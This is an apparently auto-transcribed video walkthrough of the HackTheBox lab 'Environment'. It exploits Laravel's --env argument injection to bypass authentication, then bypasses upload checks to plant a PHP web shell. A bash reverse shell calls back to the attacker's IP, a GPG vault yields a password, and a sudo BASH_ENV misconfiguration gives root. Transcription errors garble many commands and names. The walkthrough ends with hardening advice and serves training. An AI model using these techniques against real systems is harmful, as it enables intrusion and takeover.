HackTheBox - Environment

Key Takeaways

What's going on YouTube? This is IPSC and we're doing environment from hack the box which starts off with exploiting two vulnerabilities within Laravel itself. Vulnerabilities in the underlying framework running websites are very dangerous because these packages are tied to custom code so they aren't updated automatically. Additionally, companies are often hesitant to make these updates as it requires a lot more effort than just normal packages. Anyways, we discover debug mode is turned on which lets us leak verbose information when we cause errors. If we cause an error on the login, we discover if we switch the app to pre-production mode, we can perform an authentication bypass. It also will show the lural version. So, we can search CVEes, find an argument pollution vulnerability, which lets us switch the application to that uh pre-production mode and perform the argument bypass. From here, there's a second vulnerability which lets us bypass upload restrictions and upload a PHP file to get a shell. After this, we decrypt a PGP protected file and then exploit a pseudo configuration to get root. So with that being said, let's just jump in. As always, we're going to start off with an end map. So - sc for default scripts, sv enumerate versions vv for double verbose. This gives us things like the ttl oa output all formats put in the end map directory and call it environment. And then the IP address of 10101.67. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open. The first one being SSH on port 22. And the banner tells us it's a Debian box. We also have HTTP on port 80. Its banner tells us it's engine X and it's directing us over to environment.htb. So let's go ahead and add this to our host file. So we'll do pseudo vt host. Then we can add 10 10 1167 environment.htb. Save that. And let's go take a look at the page. So I'm going to do http environment.htb. And it looks my burp suite is on intercept. So, I'm just going to forward that. And we get the page. Um, at the footer, we see environment copyright uh 2025 and production v1.1. I always like trying to identify what is running. So, I'm going to look at the page source to see if anything's in the header that tells me like WordPress, Drupal, Jumla, things like that. I don't see anything. Um, there is uh Wapalizer. We can look at it. We have Tailwind, um, EngineX, JavaScript doesn't really show us that much. Uh, we can run tools like Nuclei. So, I started doing this a lot more just because it does give pretty good information. So, I'm going to do environment.htb. Let this run. And then, let's see what else could we do. We could look at 404 pages. So, if I do like asd, we get this 404 not found. And this looks very much like a um Laravel error message. I'm going to go to like oxdf error message. And he has a cheat sheet because this could also be I want to say there's a JavaScript framework that kind of uh does a 404 pipe not found or something like that. But it's slightly different I want to say. Um is it here? I don't see anything. PHP FPM. Uh, looking at these screenshots, it is definitely going to look like Laural. That's the only one with like a blue background. If we click it, we can see something like this. Maybe normalize 801. Let's see this. Yes, it does match. So, this is definitely going to be Laravel. There's other ways you could flag that as well. Um, I'm sure if we look at like the cookies. So let's go over to the storage. We can see there is a laral session which is the default name and this XSRF token. I want to say if it was like Django the default CSRF um just small nuances that can easily kind of um tell what's going on. So we know this is a Laravel page. We have a join or mailing list. So I'm just going to see if this functionality works. We do root at.rocks email added. And I'm gonna be curious if it uses like the API or anything. So let's send this join. Send it over. Where are we making this request to? Just slashmailing. Um, looking at these headers, I don't think this is going to any type of built-in Laravel API. Uh, we have a token here. If we didn't send this token, uh, we just get the page expired. That is expected. Um, if we hit this page with no email, it just directs us back. So, nothing too interesting, right? Um, I'm going to run a go buster. So, we can do go buster directory mode--youu http environment.htb word list. I need to spell that correctly. Um, what is it? Opt sec discovery web content raft small words.ext. run that. And we're getting a lot of just 403s. So I want to add this to my um block list. So I'm going to do dashb. I'm going to say 403 404. So this means it's going to hide any status code of 403 and 404 from us, which just makes it a little bit easier. Uh we see upload goes to a 405. And this size is pretty big, right? Um, so let's go take a look at what a 405 page looks like. I'm just going to go slashupload. And I probably should turn my burp suite off. Uh, we get a method not allowed. And this is in debug mode because we can see a lot of information. We see Laravel version 11.30.0. And we kind of see what the page looks like or um, data here. So, this does start giving us access to the source code, but I don't think we saw anything really that interesting, right? Uh, we could dig through all the frames, but first we see what version of Laravel is running. Um, if we do Laravel release notes, maybe this will have like the dates and everything. We can see how old this is. Uh, let's see. Larville 11.x. This looks good. 1113. We don't see anything here. Um, let's just go to CVE details. I'm sure if we did more research around change logs, release notes, we could find exactly when this version came out, but I really don't care that much about it. I just want to know like CVE against Laravel. So, looking at this, I'm going to click on vulnerabilities and we can see quite a few, right? Um, let's see. full stack framework in LiveWire version three. I don't know if this server is using Livewire. I'm assuming it's unauthenticated because it's 9.8. Um, but I'm going to move on from that. I also think this box was um published probably right around this time. So, it's possible this CVE is interesting. Um, let's see. Orville is a web framework. When using wild card validation on a given file or image field files star, a user crafted request could bypass validation rules. Um, I don't see any like file upload. I haven't seen any fields with file. So, I'm going to ignore this one for now. Laravel pulse. I don't know exactly what that is. Monitoring tool. Let's see. Larville's web application framework. When the register arg directive is set on, any user can call a URL with a special crafted query string and change the environment used by Laravel handling the request. So, this kind of sounds interesting. Let's see um how to do this. I'm just going to go GitHub PC and see if anything comes up. We have this CVE. Let's see. Does it tell us exactly how to use it? Waiting for the page to load. It's talking about it. PC example. So it changes to local. Okay. So we do question mark as a parameter d- is equal to something. So let's go ahead and see if this works. So chances are the environment is production. I would guess it's kind of development because it's in debug mode. It's very odd to see a production web app with debug mode turned on to get that verbose error message, but let's try this. I'm going to do question mark- env. And we'll say dev. That's a common one, right? And we see it is reflected here. Um, my first thought is, is it weird where we can actually execute system code? Um, so we can do please subscribe like this. I really don't think this would work, but something we kind of test, right? it is going to be URL encoding all these. So, it doesn't look like we have a way to do that. And we also can't really do cross-sight scripting. That is good to know, right? Um I don't really see any other pages. Let's go back to our Go Buster. Uh we have a /lo upload errors. Mailing is a 405. We got up. So, let's check up and login. I'm really curious what up is. Uh if we just go up, uh applications up. I don't know what I expected. Uh we got a login endpoint. So we have um username password. So we can do something here and see if this goes to like an API and see what this login request looks like. Right? It's just making a post to /lo. So I don't think it's using the internal laravel API. Um if we for this request let's see invalid credentials. uh we could identify like potential um SQL injection. So I'm going to cause an error message in this and see uh what happens, right? Because we can potentially see source code if we cause error messages. So normally in PHP um we notice this a lot in like reverse shell scripts when you just do like system request cmd. If you don't specify the cmd, it errors telling you we need cmd parameters. Um, so I'm just going to get rid of I guess the email parameter. And we'll for this along and there we go. It's trying to get the email parameter and it can't. So that's why we error here. And looking at this, we do a post to login. Let's see. I don't see exactly where it's sending the you um email and password. So I can't tell if it's using like prepared queries, the laral syntax, how it's actually doing login. Um this syntax is really odd, right? We have this if remember is equal to false then keep logged in is false. Um else it's true. Keep logged into true and then we set it to false here. I don't see this variable um initialized as keep log in. Right? So if I have remember and I set it to something that's not true or false then it won't be initialized and we'll error here so we can see more of the code down below. So that's my logic and what I'm going to do next. Right? So let's try this again. We'll do this turn intercept on forward it along and let's say remember is equal to please subscribe. It just doesn't have to be true or false right? We could probably just if we didn't set it at all it would probably error when it's trying to grab this variable right so we have to set to something just can't be true or false I believe go here and now we error on line 75 which is much lower and we can see more of the code right so now we see this f app environment is prepro then it's automatically going to just log in with um the very first user ID and here it's using the correct syntax to um pull the user I'm guessing The next line down will be um like user.p password is equal to something. So uh it's not vulnerable to SQL injection but it is going to be vulnerable to authentication bypass. So we just have to set the environment to prepro. So let's go ahead and go back to the login. Do this um once more with feeling. Click this go in and let's see post to login. And I'm going to specify d- env is equal to prepro. And this should trigger that one uh piece of code that's just going to automatically put the um user ID one into our session. So for this send it and we get logged in. So we have the dashboard the profile and log out. Um we could also change this. So we can do d- env is equal to prepro to see if there's any hidden features. And we do get a PHP info page. So I'm going to go click that. Um it looks like the link goes away. So that's a bit annoying. Let's see. This goes to management. So I can do info prepro like that. And there we go. We have a PHP info page. Now this doesn't actually buy us anything. Um, but the first thing I do is just search for passwords because this is going to export like the environment, right? So, I'm looking for like u MySQL passwords, right? As passwords, things like that. Um, let's see. SQL light. Do we have where it's loading? I'm trying to find out like do we know this application is SQLite or not? Um, but I didn't see any passwords in this PHP info page. So, nothing too interesting. Um this is not clickable so we can't really do anything here. If we go to profile we can choose a new picture and upload it. So um traditional PHP whenever you can upload files it's very very dangerous because if you upload a PHP script um you can get code code execution. So let's go ahead and try that. Um and I just realized I never talked about what nuclei I found. So I guess we can go over this real quick. Um let's see. It found laral there. C surf token. Um, oddly enough, it checks SSH. Let's see. So, I guess it's doing like a port scan. I thought it was just web, but it does a little bit more. Um, I guess the most interesting to me is tech detect to laravel, and it finds it there. But nothing too interesting here from nuclei. So, now, uh, let's go ahead and copy this image here just in case we need it. Um, I'm also going to do vShell.php. And let's see, I want to do um a system request request cmd. And I know I have a typo there. I will fix that momentarily. There we go. Save that. So now let's go ahead and try a upload. So let's see. Proxy intercept on. Let's upload. Uh, choose a new picture. Let's go to HTTP environment. And then first I'm just going to upload shell.php. Upload. Send it over to repeater. And let's see if we just send this. We have invalid error detected. And I'm just going to autoscroll here to make it easier. And let's see. I'm going to change this to be um imagegif. Send it invalid file. Let's see. We can do shell.gif. Still invalid file. Let's change the magic bytes. I want to say it's like gif 89a. Like if that's the beginning of a file, I want to say it detects it as gif. And it uploaded. So let's try shell.gif.php. and we get invalid file detected. So let's see what can we do here. Um we don't have any like include options. So we can't do like a file inclusion. And if we just try to access this URL um all already exist. Let's do shell one. Let's see environment.htb goes in storage files shell gif. If we just try to access this, um, let's see what happens. Get rid of those backslashes. It contains errors. Um, question mark sleep is equal to one. It comes back immediately. So, we know it's not executing code because we don't have the PHP extension. Um, and it looks like it is kind of filtering for that, right? Uh, we could try like PHP 5. Uh, PHP 5 looks like it uploaded. Let's see. Does this actually execute with PHP 5? I doubt it because it's engine X. Um, Apache is very like loose with how it executes. Normally in engine X, um, you have the like location header or whatever it is in the code. Um, specify only ph.PHP gets passed through. Uh it is in repeater. If we send this, what happens? It just echoes everything back. So PHP 5 does not work. Um but what is interesting about this is it allowed it, right? It doesn't allow us doing PHP, but it allows PHP 5. So what that tells me is there's a like blacklist around what extensions we can upload, right? And if we think back looking at the CVEEs, we went back to Laravel, right? There was one that said, what is it? Image validation. A user craft a malicious request could bypass validation rules. Um, so I'm going to turn intercept off. Let's click this. Does it tell us anymore? Uh, let's go to the advisory. We may have to just search the CVE for a P. Um, that gives us no details. the commit. Is this going to tell us anything? If not, then we can just search for this CVE and it should come up pretty quickly, right? Uh, this does a lot more things than just one thing. So, it's probably going to be quicker just to search GitHub PC, go to Google, um, advisory whiz.io. This normally has actual PC's. See impact let's see the issue bypass validation rules does not say how to bypass though let's see here's a actual PC 271 uh this is a different CVE 52 not 55 let's See, let's just try searching the CVE and see if we get a like write up or something like that. Uh, this looks like a blog post. MIGO security. Uh, let's see. When using wild card, that's what we saw. Let's see. Replace instance.holder with static placeholder hash cross validator. So it looks like maybe um some type of validator is removing characters at the end. So like a dot and a star gets removed. So I'm guessing like let's try this real quick. If I do PHP star uh page expired, so we have to go back and get a fresh cookie. Uh we have to log in, I guess. Rootsc.rocks password. I'm guessing it like trims the end of a URL and that's how this vulnerability comes into play. So send this we need to do um D-N is equal to prepro forward along profile intercept on choose picture upload and let's see I just replace This what I have before. Not that one. This one. There we go. Send it along. And it looks like it uploaded. I wonder if it wrote to just PHP. Let's copy. Uh where is the page? Uh we actually can go here. It would be shell file not found. Um let's try adding a dot on the end. Send this. And there we go. The dot is not apparent here. We just wrote to shell one.php. So it looks like it's trimming the end period. So if I now go back to this one, we don't have that PHP string, which means if we change this to a post request, we can say cmd is equal to id. And there we go. Code execution. So let's do a b- c b- i dev tcp 1010 148 9,0001 0 and one like that. Let's make sure this is all URL encoded. then n bnp 9,0001 send and we get a shell. Awesome. So let's um create the proper TTY. Python 3- C import pty pty spawn bin bash then stty raw minus echo foreground enter and let's see we can also um fix our rows. So rows 26 columns 121 sty rows 26 columns 121 and then export term is equal to xterm. And now we can clear the screen. Awesome. So the first thing I always like doing on web servers is dumping the database. So let's see if we can find where it's at. I'm in app storage. Um let's see. Find. Grepsql. Do we just have a database? There is a databases directory. SQLite 3 databases. Awesome. Dump. And we have users. Awesome. So that's the mailing list. Uh Cooper, Bob, Xander. Nothing too interesting there. Let's see. Um sessions. There we go. And we have some passwords. So let's see. This is going to be the users table. Um we can do email and password. So select email password from users. And we have a list of things. And I don't think cracking this actually gets us anything. So I'm not going to do it. But I still wanted to um show the process, right? Because if we were on this box, let's exit out of SQLite. I did control D and we went to /home. We discover hish is um anyone can go into this directory, right? And we can get user.text here. And we also see a backup directory. And the backup directory does have stuff. So we can see there is a keyvault.gpg. So if we try to like gpg-d key vault like this um we can't create the directory ver dubdubdub.gnupg. If we look there is a gnupg directory in hish. uh if I can type and this has the key ring right and if there's a password here we'll have to do um like hashcat or john to crack it but we can see if there is a password so what I'm going to do is just cp-r this directory over to devshm and then I'm going to do a gpg I think it's d-home devshmu like this and then we would try to specify the key volt. Uh let's see error creating backup key volt. See is it gpg-h grap home? Uh, it's probably D8 H. There we go. What are the options? I know there's a way to specify home. Maybe it was in the man page or something. Let's see. Maybe it's home. D. Okay, that is progress. So, let's do home hash backup key vault. Let's see error creating this directory. Um, let's see and do export. So, right now if I do echo home, it thinks my home is var dubdubdubdub. So I'm going to export home is equal to home hish and change that. So now it thinks my home directory is that. And now let's try running this. And the easiest thing to do is probably to back up this GNUg directory, copy these locally and then just run it on your local box, right? But I want to try getting it this way. Um, let's see. Error creating. Oh, I don't have a dash d. There we go. Um, let's do export home is equal to var dubdubdub. Did I even need to change my home directory? Was this just me forgetting the dash d? It was. So, uh, if you just specify the home der where the gnupg file is, you don't have to copy that back. Just don't forget the dash d to decrypt, right? And we have PayPal environment.htb and facebook.com. Now, this is probably going to be the password for the user hish, right? Because that's where we have the backup. So, I'm just going to try ssh hish at environment.htb paste in that password and we get logged in. Now, we already saw the home directory, right? That's not too important. If I do a pseudo-l, put the password in, we can see um the pseudo. And this is interesting. Whenever I see environment keep that is interesting to me right we're keeping env and bash environment and we're able to execute user bin system info so let's see what this file is it is a bash script I just do ls we can see it's just going to display a bunch of things so we can just quickly execute this if we did pseudo this that's what it does right but looking at it it's not doing Hold on. Pseudo dashl. Let's see. Okay. I was thinking we could set like the um what is it? Not the home directory. Um I am blanking on the name. The path. I was thinking we could just have the path set and it would keep it, but we could only um keep two variables, env. So, I'm going to Google what bash env is. So, let's go here. I have to turn my proxy off. Let's see. Bash env when bash executes a script then expanded the name of the So, it's the bash startup file. So all I have to do is create a startup file. So we can do devshm um parent.sh is what I'll call it bin bash. And let's say this is just going to execute bash. Uh we probably want to make this executable. And now we can go back to where we executed this. And I can say pseudo bash environment is equal to devshm.sh. So what this is going to do is it's going to execute this script as my like bash init. And what it does it's just going to drop me into a shell. There we go. Awesome. And that is going to be the root. So we can do that. And we can get root.ext. And yeah, that is the box. So um hope you enjoyed it. take care. And um actually real quick um if we want to talk about hardening the box since we did this pretty quickly uh we can show this real quick. Um if we just hit slashupload, right? That's where we get this error message. And this is very bad whenever it's in production. Um so I bet if we went to var dubdubdub uh let's go app maybe. Is there env. Let's see. There we go. We got this app debug. So, if we just change this to false. Um, let's see. Service PHP fpm restart. Does that work? Oh, shoot. Um, how do I restart this? Fine. PHP. Uh, systemct ctl restart php8.2-fpm. That looks promising. It's taking some time. Uh, I wonder if it can't restart because I have a shell open and that's what it's hanging on, right? I'm just going to exit this real quick. And that may speed things up. Soon as I did that, you saw this um finish, right? So, just waiting to stop that process. So now when I do it, we just get the server returned a45 method, right? It's not giving you that laral debug output, which is um helpful for developers, very helpful for attackers. So you always want to have that, right? Uh you could have a second way to do this, I want to say. Um let's see, ver dubdubdub app. Let's see. V. So if we didn't have this, so let's set this back to true. and then systemct ctl restart php82 fpm. So there we go. We're back there. Um I think it's like engine x sites. Uh yeah, enabled. We could probably muck around with this. So, let's see. Engine X PHP FPM intercept error. I want to say this is going to get me to the page. I've never really done this with PHP FPM, but I assume it is possible. FastGI intercept errors on. Okay. And this stanza, this is why we can't do PHP 5, right? This is just saying anything that ends in PHP, send it to PHP FPM, which executes the PHP script since it has the PHP and then end of string. That's why PHP 5 6 7 whatnot don't work, right? Um, so let's do systemctl restart engineext. Does that alone fix this? We probably have to like say where the error goes. Okay, that did not do it alone. Let's see. I want to I don't think this is going to be right, but I'm curious. No. So, how do we do this? Oh, wait. The error message wasn't 403. I want to say it was 405. Um, we go back. I think this where I ran Go Buster 403. Let's see. Upload. Damn it. Upload. There we go. Yeah, the status code is 405. So, let's go ahead and do this. 405. Save it. Restart. Refresh. And there we go. So now engine X whenever it sees that 405 status code, it's just going to give us a not allowed. So there's two different ways we could have blocked that verbose error message um from reaching the user. The recommended way definitely not run the application in debug mode because some frameworks may do additional things, right? There is like a Xdebug header in PHP that we saw I think in like the Olympus machine years ago that when it's set you can just run PHP based upon the header. Um Laravel doesn't allow that but you never know exactly what your framework's allowing by being in debug mode, right? So always best to not run the framework in debug mode and then you could double check it by just having your engine X um hide specific error messages. So with that being said, that's going to be the box. Hope you guys enjoyed it. Take care and I will see you all next